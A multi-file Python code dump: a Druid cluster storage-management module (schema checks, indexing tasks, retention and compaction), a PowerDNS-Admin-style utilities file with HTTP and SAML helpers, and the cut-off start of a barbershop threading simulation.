broker_host, broker_port = conn_info[HOST], conn_info[PORT]
druid_schema_url = f"http://{broker_host}:{broker_port}/druid/v2/sql/"
druid_schema_sql = (
'{"query": "SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS '
"WHERE TABLE_NAME = '%s'\"}" % physical_tn
)
ok, druid_schema = post(druid_schema_url, params=json.loads(druid_schema_sql))
if not ok or not druid_schema:
return result
logger.info(f"physical_tn: {physical_tn}, druid_schema_url: {druid_schema_url}, druid_schema: {druid_schema}")
for e in druid_schema:
result["druid_fields"][e["COLUMN_NAME"].lower()] = e["DATA_TYPE"].lower()
append_fields, bad_fields = check_rt_druid_fields(result[RT_FIELDS], result["druid_fields"])
result[CHECK_DIFF] = {APPEND_FIELDS: append_fields, BAD_FIELDS: bad_fields}
if bad_fields:
result[CHECK_RESULT] = False
logger.info(f"diff result: {result}")
return result
def check_rt_druid_fields(rt_table_columns, druid_columns):
"""
    Compare the rt's fields with the fields of the druid physical table
    :param rt_table_columns: the rt's fields after being converted to druid fields
    :param druid_columns: fields of the druid physical table
    :return: (append_fields, bad_fields), the fields to be added and the fields whose types changed
"""
append_fields, bad_fields = [], []
for key, value in rt_table_columns.items():
col_name, col_type = key.lower(), value.lower()
        if col_name in druid_columns:
            # then compare the types; a missing column falls through to append_fields
druid_col_type = druid_columns[col_name]
ok = (
(col_type == druid_col_type)
or (col_type == STRING and druid_col_type == VARCHAR)
or (col_type == LONG and druid_col_type == BIGINT)
)
if not ok:
bad_fields.append({col_name: f"difference between rt and druid({col_type} != {druid_col_type})"})
else:
append_fields.append({FIELD_NAME: col_name, FIELD_TYPE: col_type})
return append_fields, bad_fields
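# Hedged worked example (assuming FIELD_NAME == "field_name" and FIELD_TYPE == "field_type"):
# comparing
#     rt_table_columns = {"ip": "string", "cnt": "long", "new_col": "string"}
#     druid_columns    = {"ip": "varchar", "cnt": "double"}
# yields append_fields == [{"field_name": "new_col", "field_type": "string"}]
# and bad_fields == [{"cnt": "difference between rt and druid(long != double)"}].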
def clusters():
"""
    Get the list of druid storage clusters
    :return: list of druid storage clusters
"""
result = model_manager.get_storage_cluster_configs_by_type(DRUID)
return result
def create_task(rt_info):
"""
    Create an indexing task
    :param rt_info: configuration info of the rt
    :return: location of the created task
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
zk_addr = conn_info.get(ZOOKEEPER_CONNECT)
overlord = _get_role_leader(zk_addr, OVERLORD, druid[STORAGE_CLUSTER][VERSION])
task_config = _get_task_config(rt_info)
url = f"http://{overlord}{ENDPOINT_RUN_TASK}"
result, resp = post(url=url, params=json.loads(task_config))
if not result or not resp[TASK]:
logger.error(f"create task error, url: {url}, param: {task_config}, result: {resp}")
raise DruidCreateTaskErrorException(message_kv={RESULT_TABLE_ID: rt_info[RESULT_TABLE_ID]})
    # get the address of the running task
task_id = resp[TASK]
    # poll for the result
return _get_task_location(overlord, task_id)
def _get_task_location(overlord, task_id, max_times=3):
"""
    :param overlord: overlord node
    :param task_id: task id
    :param max_times: maximum number of retries
    :return: task location
"""
if max_times < 0:
return ""
running_tasks = _get_tasks(overlord, TASK_TYPE_RUNNING)
for task in running_tasks:
if task[ID] == task_id:
task_location = f"http://{task[LOCATION][HOST]}:{task[LOCATION][PORT]}{ENDPOINT_PUSH_EVENTS}"
return task_location
time.sleep(5)
max_times = max_times - 1
return _get_task_location(overlord, task_id, max_times)
def shutdown_task(rt_info):
"""
    :param rt_info: result table info
    :return: whether the shutdown succeeded or failed
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
overlord = _get_role_leader(zk_addr, OVERLORD, druid[STORAGE_CLUSTER][VERSION])
return _shutdown_task_with_retry(overlord, physical_tn)
def _shutdown_task_with_retry(overlord, data_source, max_times=3):
"""
    Stop the task
    :param overlord: overlord node
    :param data_source: datasource
    :param max_times: maximum number of retries
    :return: whether the task was stopped
"""
if max_times < 0:
raise DruidShutDownTaskException(message_kv={MESSAGE: "shut down overtime"})
running_tasks = _get_tasks(overlord, TASK_TYPE_RUNNING)
pending_tasks = _get_tasks(overlord, TASK_TYPE_PENDING)
tasks = running_tasks + pending_tasks
counter = 0
for task in tasks:
if task[ID].find(data_source) > 0:
peon_url = f"http://{task[LOCATION][HOST]}:{task[LOCATION][PORT]}{ENDPOINT_SHUTDOWN_TASK}"
resp = requests.post(peon_url)
logger.info(f"shutdown task info, url: {peon_url}, result: {resp.content}")
if resp.status_code != 200:
logger.error(f"shutdown task exception, {resp}")
raise DruidShutDownTaskException(message_kv={MESSAGE: resp})
logger.info(f"shutdown task success, peon_url: {peon_url}, task_id: {task[ID]}")
else:
counter = counter + 1
if counter == len(tasks):
return True
time.sleep(5)
max_times = max_times - 1
return _shutdown_task_with_retry(overlord, data_source, max_times)
def _get_druid_storage_info(rt_info):
"""
    Get the basic storage info
    :param rt_info: info of the rt
:return: druid, physical_tn, conn_info
"""
druid = rt_info[STORAGES][DRUID]
physical_tn = druid[PHYSICAL_TABLE_NAME]
conn_info = json.loads(druid[STORAGE_CLUSTER][CONNECTION_INFO])
return (
druid,
physical_tn,
conn_info,
)
def _get_role_leader(zk_addr, zk_node, druid_version):
"""
    :param zk_addr: zk connection info
    :param zk_node: zk node type
    :param druid_version: Druid version
    :return: the leader of the given role
"""
path = f"{ZK_DRUID_PATH}/{zk_node.lower() if druid_version == DRUID_VERSION_V1 else zk_node.upper()}"
zk = KazooClient(hosts=zk_addr, read_only=True)
zk.start()
result = zk.get_children(path)
zk.stop()
if not result or len(result) == 0:
logger.error(f"not found any zk path {path}, or this path is empty")
raise DruidZkConfException()
role = random.sample(result, 1)[0]
if zk_node in ["overlord", "OVERLORD"]:
leader_url = f"http://{role}/druid/indexer/v1/leader"
elif zk_node in ["coordinator", "COORDINATOR"]:
leader_url = f"http://{role}/druid/coordinator/v1/leader"
else:
logger.error(f"the zk path {path} is not for overlord or coordinator, please input a correct path")
raise DruidZKPathException()
resp = requests.get(leader_url, timeout=HTTP_REQUEST_TIMEOUT)
if resp.status_code != 200:
logger.error(f"failed to get leader from url: {leader_url}")
raise DruidHttpRequestException()
    # strip the scheme prefix; str.strip() removes characters, not a prefix
    leader = resp.text[len("http://"):] if resp.text.startswith("http://") else resp.text
return leader
def _get_task_config(rt_info):
"""
    :param rt_info: result table info
    :return: the Druid task configuration
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
task_config_dict = {
"availability_group": f"availability-group-{str(uuid.uuid4())[0:8]}",
"required_capacity": DEFAULT_TASK_MEMORY,
"data_source": physical_tn,
"metrics_spec": _get_dimensions_and_metrics(rt_info)["metrics_fields"],
"segment_granularity": DEFAULT_SEGMENT_GRANULARITY,
"timestamp_column": DEFAULT_TIMESTAMP_COLUMN,
"dimensions_spec": _get_dimensions_and_metrics(rt_info)["dimensions_fields"],
"dimension_exclusions": [],
"max_idle_time": DEFAULT_MAX_IDLE_TIME,
"window_period": DEFAULT_WINDOW_PERIOD,
"partition_num": random.randint(1, INT_MAX_VALUE),
"context": {
"druid.indexer.fork.property.druid.processing.buffer.sizeBytes": DEFAULT_TASK_MEMORY * 1024 * 1024 / 11,
"druid.indexer.runner.javaOpts": "-Xmx%dM -XX:MaxDirectMemorySize=%dM"
% (DEFAULT_TASK_MEMORY * 6 / 11 + 1, DEFAULT_TASK_MEMORY * 5 / 11 + 1),
},
}
task_config = TASK_CONFIG_TEMPLATE.format(**task_config_dict).replace("'", '"')
return task_config
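# Hedged arithmetic note: with an assumed DEFAULT_TASK_MEMORY of 2048 (MB), the
# context rendered above asks for roughly a 1118M heap (2048*6/11 + 1), 931M of
# direct memory (2048*5/11 + 1) and a processing buffer of about 195,225,786
# bytes (2048*1024*1024/11, roughly 186 MiB).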
def _get_dimensions_and_metrics(rt_info):
"""
    :param rt_info: result table info
    :return: the dimension and metric fields
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
storage_config = json.loads(druid.get(STORAGE_CONFIG, "{}"))
dimensions_fields = storage_config.get("dimensions_fields", [])
metrics_fields = storage_config.get("metrics_fields", [])
default_dimensions = [{NAME: str(field[FIELD_NAME]), TYPE: str(field[FIELD_TYPE])} for field in rt_info[FIELDS]]
default_metrics = [{TYPE: "count", NAME: "__druid_reserved_count", "fieldName": ""}]
dimensions_fields = dimensions_fields if dimensions_fields else default_dimensions
metrics_fields = metrics_fields if metrics_fields else default_metrics
return {"dimensions_fields": dimensions_fields, "metrics_fields": metrics_fields}
def _get_tasks(overlord_conn_info, task_type):
"""
    :param overlord_conn_info: overlord connection info
    :param task_type: task type
    :return: the set of tasks of that type
"""
if task_type not in [TASK_TYPE_RUNNING, TASK_TYPE_PENDING]:
        raise NotSupportTaskTypeException(message_kv={TASK_TYPE: task_type})
if task_type == TASK_TYPE_RUNNING:
result, resp = get(f"http://{overlord_conn_info}{ENDPOINT_GET_RUNNING_TASKS}")
else:
result, resp = get(f"http://{overlord_conn_info}{ENDPOINT_GET_PENDING_TASKS}")
if not result:
raise DruidQueryTaskErrorException()
return resp
def get_roles(cluster_name):
"""
    :param cluster_name: cluster name
    :return: mapping from each druid role to its nodes
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, DRUID)
conn_info = json.loads(cluster.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
zk = KazooClient(hosts=zk_addr, read_only=True)
zk.start()
result = zk.get_children(ZK_DRUID_PATH)
if not result or len(result) == 0:
logger.error("Failed to get overload node")
zk.stop()
raise DruidZkConfException()
data = dict()
for role in result:
data[role] = zk.get_children(f"{ZK_DRUID_PATH}/{role}")
zk.stop()
return data
def get_datasources(cluster_name):
"""
    :param cluster_name: cluster name
    :return: list of datasources in the cluster
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, DRUID)
conn_info = json.loads(cluster.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
coordinator = _get_role_leader(zk_addr, COORDINATOR, cluster.version)
result, resp = get(f"http://{coordinator}{ENDPOINT_GET_DATASOURCES}")
if not result:
raise DruidQueryDataSourceException(message_kv={MESSAGE: resp})
return resp
def get_workers(cluster_name):
"""
    :param cluster_name: cluster name
    :return: worker info
"""
overlord = get_leader(cluster_name, OVERLORD)
result, resp = get(f"http://{overlord}{ENDPOINT_GET_RUNNING_WORKERS}")
if not result:
raise DruidQueryWorkersException(message_kv={MESSAGE: resp})
return resp
def get_historical(cluster_name):
"""
    :param cluster_name: cluster name
    :return: historical capacity
"""
coordinator = get_leader(cluster_name, COORDINATOR)
result, resp = get(f"http://{coordinator}{ENDPOINT_HISTORICAL_SIZES}")
if not result:
raise DruidQueryHistoricalException(message_kv={MESSAGE: resp})
return resp
def get_cluster_capacity(cluster_name):
"""
    :param cluster_name: cluster name
    :return: capacity info
"""
cluster_capacity = {
"slot_capacity": 0,
"slot_capacity_used": 0,
"slot_usage": 0,
"used_size": 0,
"max_size": 0,
"storage_usage": 0,
"segments_count": 0,
"timestamp": time.time(),
}
try:
        # fetch druid worker slot info
worker_info = get_workers(cluster_name)
if worker_info:
for worker in worker_info:
cluster_capacity["slot_capacity"] = cluster_capacity["slot_capacity"] + worker["worker"]["capacity"]
cluster_capacity["slot_capacity_used"] = (
cluster_capacity["slot_capacity_used"] + worker["currCapacityUsed"]
)
        # fetch historical capacity info
historical_info = get_historical(cluster_name)
if historical_info:
for historical in historical_info:
if historical[TYPE] == "historical":
cluster_capacity["used_size"] = cluster_capacity["used_size"] + historical["currSize"]
cluster_capacity["max_size"] = cluster_capacity["max_size"] + historical["maxSize"]
        # fetch the total number of segments
coordinator = get_leader(cluster_name, COORDINATOR)
datasource_list_url = f"http://{coordinator}/druid/coordinator/v1/datasources/"
ok, datasource_list = get(datasource_list_url)
segments_sum = 0
for physical_tn in datasource_list:
segments_url = f"http://{coordinator}/druid/coordinator/v1/datasources/{physical_tn}"
ok, datasource_meta = get(segments_url)
segments_sum += datasource_meta[SEGMENTS][COUNT]
cluster_capacity["segments_count"] = segments_sum
cluster_capacity["slot_usage"] = (
int(100 * cluster_capacity["slot_capacity_used"] / cluster_capacity["slot_capacity"])
if cluster_capacity["slot_capacity"] > 0
else 0
)
cluster_capacity["storage_usage"] = (
int(100 * cluster_capacity["used_size"] / cluster_capacity["max_size"])
if cluster_capacity["max_size"] > 0
else 0
)
cluster_capacity[TIMESTAMP] = time.time()
except Exception:
logger.warning("failed to execute function druid.get_cluster_capacity", exc_info=True)
return cluster_capacity
def get_table_capacity(conn_info):
"""
    Read capacity data of the druid cluster
    :param conn_info: cluster connection info
    :return: per-datasource size and record counts
"""
url = f"http://{conn_info[HOST]}:{conn_info[PORT]}/druid/v2/sql/"
sql = (
'{"query": "SELECT datasource, sum(size * num_replicas)/1000000 as total_size, sum(num_rows) as total_nums '
'FROM sys.segments WHERE is_available = 1 GROUP BY datasource"} '
)
rt_size = {}
try:
ok, table_capacity_list = post(url, params=json.loads(sql))
if not ok or not table_capacity_list:
return rt_size
for table_capacity in table_capacity_list:
rt_size[table_capacity[DATASOURCE]] = {
TABLE_SIZE_MB: table_capacity["total_size"],
TABLE_RECORD_NUMS: table_capacity["total_nums"],
REPORT_TIME: time.time(),
}
except Exception:
logger.warning("failed to execute function druid.get_table_capacity", exc_info=True)
return rt_size
def get_leader(cluster_name, role_type):
"""
    :param cluster_name: cluster name
    :param role_type: role type
:return: overlord or coordinator
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, DRUID)
conn_info = json.loads(cluster.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
return _get_role_leader(zk_addr, role_type, cluster.version)
def get_tasks(cluster_name, task_type):
"""
    :param cluster_name: cluster name
    :param task_type: task type
    :return: the set of tasks of that type
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, DRUID)
conn_info = json.loads(cluster.connection_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
overlord = _get_role_leader(zk_addr, OVERLORD, cluster.version)
if task_type != TASK_TYPE_RUNNING and task_type != TASK_TYPE_PENDING:
raise NotSupportTaskTypeException(message_kv={TASK_TYPE: task_type})
elif task_type == TASK_TYPE_RUNNING:
result, resp = get(f"http://{overlord}{ENDPOINT_GET_RUNNING_TASKS}")
else:
result, resp = get(f"http://{overlord}{ENDPOINT_GET_PENDING_TASKS}")
if not result:
raise DruidQueryTaskErrorException()
return resp
def update_expires(rt_info, expires):
"""
    Update the data expiration rule of the datasource
    :param rt_info: result table
    :param expires: expiration time
    :return: True on success
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
expires = druid.get(EXPIRES, DEFAULT_DRUID_EXPIRES) if not expires else expires
zk_addr = conn_info[ZOOKEEPER_CONNECT]
coordinator = _get_role_leader(zk_addr, COORDINATOR, druid[STORAGE_CLUSTER][VERSION])
rule_path = f"{ENDPOINT_DATASOURCE_RULE}/{physical_tn}"
rule_url = f"http://{coordinator}{rule_path}"
result, resp = get(rule_url)
if not result:
raise DruidQueryExpiresException(message_kv={MESSAGE: f"failed to fetch the data expiration rule for {physical_tn}"})
rule = resp
if not rule or len(rule) == 0:
# no retention rule found, fall back to the default expiration rule
rule = DEFAULT_EXPIRES_RULE
# update the expiration period on the datasource rule
rule[0]["period"] = f"P{expires.upper()}"
resp = requests.post(rule_url, json=rule)
if resp.status_code != 200:
raise DruidUpdateExpiresException(message_kv={MESSAGE: f"failed to update the data expiration time for {physical_tn}"})
return True
def delete(rt_info, expires):
"""
Delete expired data from the datasource
:param rt_info: result table info
:param expires: expiration period
:return:
"""
druid, physical_tn, conn_info = _get_druid_storage_info(rt_info)
zk_addr = conn_info[ZOOKEEPER_CONNECT]
expires = druid.get(EXPIRES, "360d") if not expires else expires
overlord = _get_role_leader(zk_addr, OVERLORD, druid[STORAGE_CLUSTER][VERSION])
expires = translate_expires_day(expires)
kill_interval = _get_kill_interval(expires)
task_id = f'kill_{rt_info[RESULT_TABLE_ID]}_{kill_interval.replace("/", "_")}_{str(uuid.uuid4())[0:8]}'
data = {TYPE: "kill", ID: task_id, "dataSource": physical_tn, INTERVAL: kill_interval}
url = f"http://{overlord}{ENDPOINT_RUN_TASK}"
logger.info(f"start delete data, url:{url}, params: {json.dumps(data)}")
result, resp = post(url, data)
if not result:
raise DruidDeleteDataException(message_kv={MESSAGE: resp})
return _check_delete_result(overlord, rt_info[RESULT_TABLE_ID], task_id)
def _get_kill_interval(expires):
"""
Build the time interval covered by the kill task
:param expires: expiration period in days
:return:
"""
date_diff = (datetime.today() + timedelta(-expires + 1)).strftime("%Y-%m-%dT00:00:00.000Z")
time_utc = datetime.strptime(date_diff, UTC_FORMAT) - timedelta(hours=TIME_ZONE_DIFF)
return f"{UTC_BEGIN_TIME}/{time_utc.strftime(UTC_FORMAT)}"
def _check_delete_result(overlord, result_table_id, task_id, max_times=60):
"""
:param overlord: overlord node
:param result_table_id: result table id
:param task_id: task id
:param max_times: maximum number of polling attempts
:return:
"""
if max_times < 0:
logger.error(f"deleting expired data failed, rt: {result_table_id}, task_id: {task_id}")
raise DruidDeleteDataException(message_kv={MESSAGE: "failed to delete expired data: exceeded the maximum number of retries"})
time.sleep(5)
result, resp = get(f"http://{overlord}{ENDPOINT_RUN_TASK}/{task_id}/status")
if not result:
raise DruidDeleteDataException(message_kv={MESSAGE: "failed to check the task running status"})
result = resp
if result.get(STATUS, {}).get(STATUS, "") == SUCCESS:
return True
else:
max_times = max_times - 1
logger.info(f"Enter the next poll, max_times: {max_times}, current result: {result}")
return _check_delete_result(overlord, result_table_id, task_id, max_times)
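# With the default max_times=60 and the 5 second sleep per poll, _check_delete_result waits roughly
# five minutes for the kill task to report SUCCESS before giving up and raising.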
def segments_compaction(cluster_name, delta_day, merge_days, timeout):
"""
Compact (merge) segments
:param cluster_name: druid cluster name
:param delta_day: number of most recent days to skip before compaction
:param merge_days: number of days to merge
:param timeout: timeout for the compaction operation
:return:
"""
cluster = model_manager.get_storage_cluster_config(cluster_name, DRUID)
zk_addr = json.loads(cluster[CONNECTION_INFO])[ZOOKEEPER_CONNECT]
version = cluster[VERSION]
coordinator = _get_role_leader(zk_addr, COORDINATOR, version)
ok, datasources_used = get(f"http://{coordinator}{ENDPOINT_GET_DATASOURCES}")
if not ok:
return False
for datasource in datasources_used:
try:
coordinator = _get_role_leader(zk_addr, COORDINATOR, version)
ok, resp = get(f"http://{coordinator}/druid/coordinator/v1/datasources/{datasource}/")
if not ok:
continue
last_day = datetime.strptime(resp[SEGMENTS][MINTIME], "%Y-%m-%dT%H:%M:%S.000Z").strftime("%Y-%m-%d")
end_date = (datetime.today() - timedelta(delta_day)).strftime("%Y-%m-%d")
begin_date = (datetime.today() - timedelta(delta_day + merge_days)).strftime("%Y-%m-%d")
if end_date <= last_day:
continue
begin_date = last_day if last_day > begin_date else begin_date
merge_segments(zk_addr, datasource, begin_date, end_date, version, timeout, merge_days)
except Exception:
logger.warning(f"segments compaction failed for datasource {datasource}", exc_info=True)
return True
|
utils.py
|
import re
import json
import requests
import hashlib
from app import app
from distutils.version import StrictVersion
from urllib.parse import urlparse
from datetime import datetime, timedelta
from threading import Thread
from .certutil import KEY_FILE, CERT_FILE
if app.config['SAML_ENABLED']:
from onelogin.saml2.auth import OneLogin_Saml2_Auth
from onelogin.saml2.idp_metadata_parser import OneLogin_Saml2_IdPMetadataParser
idp_timestamp = datetime(1970, 1, 1)
idp_data = None
if 'SAML_IDP_SSO_BINDING' in app.config:
idp_data = OneLogin_Saml2_IdPMetadataParser.parse_remote(app.config['SAML_METADATA_URL'], entity_id=app.config.get('SAML_IDP_ENTITY_ID', None), required_sso_binding=app.config['SAML_IDP_SSO_BINDING'])
else:
idp_data = OneLogin_Saml2_IdPMetadataParser.parse_remote(app.config['SAML_METADATA_URL'], entity_id=app.config.get('SAML_IDP_ENTITY_ID', None))
if idp_data is None:
print('SAML: IDP Metadata initial load failed')
exit(-1)
idp_timestamp = datetime.now()
def get_idp_data():
global idp_data, idp_timestamp
lifetime = timedelta(minutes=app.config['SAML_METADATA_CACHE_LIFETIME'])
if idp_timestamp+lifetime < datetime.now():
background_thread = Thread(target=retrieve_idp_data)
background_thread.start()
return idp_data
def retrieve_idp_data():
global idp_data, idp_timestamp
if 'SAML_IDP_SSO_BINDING' in app.config:
new_idp_data = OneLogin_Saml2_IdPMetadataParser.parse_remote(app.config['SAML_METADATA_URL'], entity_id=app.config.get('SAML_IDP_ENTITY_ID', None), required_sso_binding=app.config['SAML_IDP_SSO_BINDING'])
else:
new_idp_data = OneLogin_Saml2_IdPMetadataParser.parse_remote(app.config['SAML_METADATA_URL'], entity_id=app.config.get('SAML_IDP_ENTITY_ID', None))
if new_idp_data is not None:
idp_data = new_idp_data
idp_timestamp = datetime.now()
print("SAML: IDP Metadata successfully retreived from: " + app.config['SAML_METADATA_URL'])
else:
print("SAML: IDP Metadata could not be retreived")
if 'TIMEOUT' in app.config.keys():
TIMEOUT = app.config['TIMEOUT']
else:
TIMEOUT = 10
def auth_from_url(url):
auth = None
parsed_url = urlparse(url).netloc
if '@' in parsed_url:
auth = parsed_url.split('@')[0].split(':')
auth = requests.auth.HTTPBasicAuth(auth[0], auth[1])
return auth
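# Illustrative example (hypothetical URL, not from any real configuration): for
# "http://admin:secret@pdns.example.com:8081/api/v1" the netloc is "admin:secret@pdns.example.com:8081",
# so auth_from_url returns HTTPBasicAuth('admin', 'secret'); URLs without embedded credentials yield
# None and the request goes out unauthenticated.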
def fetch_remote(remote_url, method='GET', data=None, accept=None, params=None, timeout=None, headers=None):
if data is not None and type(data) != str:
data = json.dumps(data)
if timeout is None:
timeout = TIMEOUT
verify = False
our_headers = {
'user-agent': 'powerdnsadmin/0',
'pragma': 'no-cache',
'cache-control': 'no-cache'
}
if accept is not None:
our_headers['accept'] = accept
if headers is not None:
our_headers.update(headers)
r = requests.request(
method,
remote_url,
headers=our_headers,
verify=verify,
auth=auth_from_url(remote_url),
timeout=timeout,
data=data,
params=params
)
try:
if r.status_code not in (200, 400, 422):
r.raise_for_status()
except Exception as e:
raise RuntimeError('Error while fetching {0}'.format(remote_url)) from e
return r
def fetch_json(remote_url, method='GET', data=None, params=None, headers=None):
r = fetch_remote(remote_url, method=method, data=data, params=params, headers=headers,
accept='application/json; q=1')
if method == "DELETE":
return True
if r.status_code == 204:
return {}
try:
assert('json' in r.headers['content-type'])
except Exception as e:
raise RuntimeError('Error while fetching {0}'.format(remote_url)) from e
# don't use r.json here, as it will read from r.text, which will trigger
# content encoding auto-detection in almost all cases, WHICH IS EXTREMELY
# SLOOOOOOOOOOOOOOOOOOOOOOW. just don't.
data = None
try:
data = json.loads(r.content.decode('utf-8'))
except Exception as e:
raise RuntimeError('Error while loading JSON data from {0}'.format(remote_url)) from e
return data
def display_record_name(data):
record_name, domain_name = data
if record_name == domain_name:
return '@'
else:
return re.sub(r'\.{}$'.format(domain_name), '', record_name)
def display_master_name(data):
"""
input data: "[u'127.0.0.1', u'8.8.8.8']"
"""
matches = re.findall(r'\'(.+?)\'', data)
return ", ".join(matches)
def display_time(amount, units='s', remove_seconds=True):
"""
Convert timestamp to normal time format
"""
amount = int(amount)
INTERVALS = [(lambda mlsec:divmod(mlsec, 1000), 'ms'),
(lambda seconds:divmod(seconds, 60), 's'),
(lambda minutes:divmod(minutes, 60), 'm'),
(lambda hours:divmod(hours, 24), 'h'),
(lambda days:divmod(days, 7), 'D'),
(lambda weeks:divmod(weeks, 4), 'W'),
(lambda years:divmod(years, 12), 'M'),
(lambda decades:divmod(decades, 10), 'Y')]
for index_start, (interval, unit) in enumerate(INTERVALS):
if unit == units:
break
amount_abrev = []
last_index = 0
amount_temp = amount
for index, (formula, abrev) in enumerate(INTERVALS[index_start: len(INTERVALS)]):
divmod_result = formula(amount_temp)
amount_temp = divmod_result[0]
amount_abrev.append((divmod_result[1], abrev))
if divmod_result[1] > 0:
last_index = index
amount_abrev_partial = amount_abrev[0: last_index + 1]
amount_abrev_partial.reverse()
final_string = ''
for amount, abrev in amount_abrev_partial:
final_string += str(amount) + abrev + ' '
if remove_seconds and 'm' in final_string:
final_string = final_string[:final_string.rfind(' ')]
return final_string[:final_string.rfind(' ')]
return final_string
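# Worked example (values chosen for illustration): display_time(3600) starts at the seconds entry of
# INTERVALS, accumulates (0, 's'), (0, 'm'), (1, 'h'), reverses the non-zero prefix and, because
# remove_seconds is set and minutes are present, trims the trailing seconds to return "1h 0m".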
def pdns_api_extended_uri(version):
"""
Check the pdns version
"""
if StrictVersion(version) >= StrictVersion('4.0.0'):
return "/api/v1"
else:
return ""
def email_to_gravatar_url(email="", size=100):
"""
AD doesn't necessarily have email
"""
if email is None:
email = ""
hash_string = hashlib.md5(email.encode('utf-8')).hexdigest()
return "https://s.gravatar.com/avatar/{0}?s={1}".format(hash_string, size)
def prepare_flask_request(request):
# If the server is behind proxies or load balancers, use the HTTP_X_FORWARDED fields
url_data = urlparse(request.url)
return {
'https': 'on' if request.scheme == 'https' else 'off',
'http_host': request.host,
'server_port': url_data.port,
'script_name': request.path,
'get_data': request.args.copy(),
'post_data': request.form.copy(),
# Uncomment if using ADFS as IdP, https://github.com/onelogin/python-saml/pull/144
'lowercase_urlencoding': True,
'query_string': request.query_string
}
def init_saml_auth(req):
own_url = ''
if req['https'] == 'on':
own_url = 'https://'
else:
own_url = 'http://'
own_url += req['http_host']
metadata = get_idp_data()
settings = {}
settings['sp'] = {}
if 'SAML_NAMEID_FORMAT' in app.config:
settings['sp']['NameIDFormat'] = app.config['SAML_NAMEID_FORMAT']
else:
settings['sp']['NameIDFormat'] = idp_data.get('sp', {}).get('NameIDFormat', 'urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified')
settings['sp']['entityId'] = app.config['SAML_SP_ENTITY_ID']
cert = open(CERT_FILE, "r").readlines()
key = open(KEY_FILE, "r").readlines()
settings['sp']['privateKey'] = "".join(key)
settings['sp']['x509cert'] = "".join(cert)
settings['sp']['assertionConsumerService'] = {}
settings['sp']['assertionConsumerService']['binding'] = 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST'
settings['sp']['assertionConsumerService']['url'] = own_url+'/saml/authorized'
settings['sp']['attributeConsumingService'] = {}
settings['sp']['singleLogoutService'] = {}
settings['sp']['singleLogoutService']['binding'] = 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect'
settings['sp']['singleLogoutService']['url'] = own_url+'/saml/sls'
settings['idp'] = metadata['idp']
settings['strict'] = True
settings['debug'] = app.config['SAML_DEBUG']
settings['security'] = {}
settings['security']['digestAlgorithm'] = 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256'
settings['security']['metadataCacheDuration'] = None
settings['security']['metadataValidUntil'] = None
settings['security']['requestedAuthnContext'] = True
settings['security']['signatureAlgorithm'] = 'http://www.w3.org/2001/04/xmldsig-more#rsa-sha256'
settings['security']['wantAssertionsEncrypted'] = False
settings['security']['wantAttributeStatement'] = True
settings['security']['wantNameId'] = True
settings['security']['authnRequestsSigned'] = app.config['SAML_SIGN_REQUEST']
settings['security']['logoutRequestSigned'] = app.config['SAML_SIGN_REQUEST']
settings['security']['logoutResponseSigned'] = app.config['SAML_SIGN_REQUEST']
settings['security']['nameIdEncrypted'] = False
settings['security']['signMetadata'] = True
settings['security']['wantAssertionsSigned'] = True
settings['security']['wantMessagesSigned'] = True
settings['security']['wantNameIdEncrypted'] = False
settings['contactPerson'] = {}
settings['contactPerson']['support'] = {}
settings['contactPerson']['support']['emailAddress'] = app.config['SAML_SP_CONTACT_NAME']
settings['contactPerson']['support']['givenName'] = app.config['SAML_SP_CONTACT_MAIL']
settings['contactPerson']['technical'] = {}
settings['contactPerson']['technical']['emailAddress'] = app.config['SAML_SP_CONTACT_NAME']
settings['contactPerson']['technical']['givenName'] = app.config['SAML_SP_CONTACT_MAIL']
settings['organization'] = {}
settings['organization']['en-US'] = {}
settings['organization']['en-US']['displayname'] = 'PowerDNS-Admin'
settings['organization']['en-US']['name'] = 'PowerDNS-Admin'
settings['organization']['en-US']['url'] = own_url
auth = OneLogin_Saml2_Auth(req, settings)
return auth
def display_setting_state(value):
if value == 1:
return "ON"
elif value == 0:
return "OFF"
else:
return "UNKNOWN"
|
main.py
|
import random
import sys
import time
from threading import Thread, Lock, Event
mutex = Lock()
# Barbershop class
# Initialized with attributes such as the barber object
# As well as the number of seats, time interval for customers to arrive, number of customers, and the range for the duration of a haircut
class BarberShop:
waitingCustomers = []
numberCustomersLeft = 0
def __init__(self, barber, numberOfSeats, customerIntervalMin, customerIntervalMax, haircutDurationMin,
haircutDurationMax):
self.barber = barber
print(f"{numCustomers} people are getting a haircut today")
print(f'BarberShop initialized with {numberOfSeats} seats')
print(f'Customer min interval {customerIntervalMin}')
print(f'Customer max interval {customerIntervalMax}')
print(f'Haircut min duration {haircutDurationMin}')
print(f'Haircut max duration {haircutDurationMax}')
print('---------------------------------------')
# Opens up the barber shop
def openShop(self):
print('Barber shop is opening')
workingThread = Thread(target=self.barberGoToWork)
workingThread.start()
# Sets the barber to work
def barberGoToWork(self):
while True:
mutex.acquire()
# Customers being served after waiting is on a first come first serve basis
# When going from the waiting state to haircut state, customer is deleted from the waiting list
if len(self.waitingCustomers) > 0:
c = self.waitingCustomers[0]
del self.waitingCustomers[0]
mutex.release()
self.barber.cutHair(c)
else:
# If there are no customers waiting but there are still more customers that are going to arrive
if customersList:
mutex.release()
print('No customers right now, going to sleep.')
barber.sleep()
print('Barber woke up')
# Else there is nobody left on the waiting list or customer list so we are done for the day
else:
print('No more customers for today. Time to close up shop.')
print('')
print('How did we do today?')
print(f'Number of customers served today: {barber.customersServed}')
print(f'Number of customers who left: {self.numberCustomersLeft}')
sys.exit()
# Handles the scenarios a customer may have when entering
